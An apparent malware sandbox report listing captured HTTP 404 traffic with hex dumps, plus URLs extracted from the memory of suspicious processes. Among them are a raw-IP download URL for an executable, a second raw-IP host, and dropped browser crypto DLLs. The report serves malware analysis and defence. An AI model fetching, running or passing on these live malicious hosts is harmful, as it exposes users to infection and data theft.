Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDm*w_c*^nUSssD
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:29:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:48 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 22:30:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0
Source: katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000000.2638757947.00000000004B4000.00000002.00000001.01000000.00000009.sdmp, katA304.tmp.12.dr String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000002.00000000.2039593214.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2038682959.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2039552832.0000000008870000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2866492017.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2954487712.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986553646.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2986940209.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: katA304.tmp, katA304.tmp, 0000000D.00000002.3150422505.000000006CFBD000.00000002.00000001.01000000.0000000D.sdmp, mozglue.dll.13.dr, mozglue[1].dll.13.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: katA304.tmp, 0000000D.00000002.3137349984.000000002021D000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3135734102.000000001DE0D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.13.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 21AE.exe, 00000005.00000003.2384311216.0000000002C93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://65.109.242.59
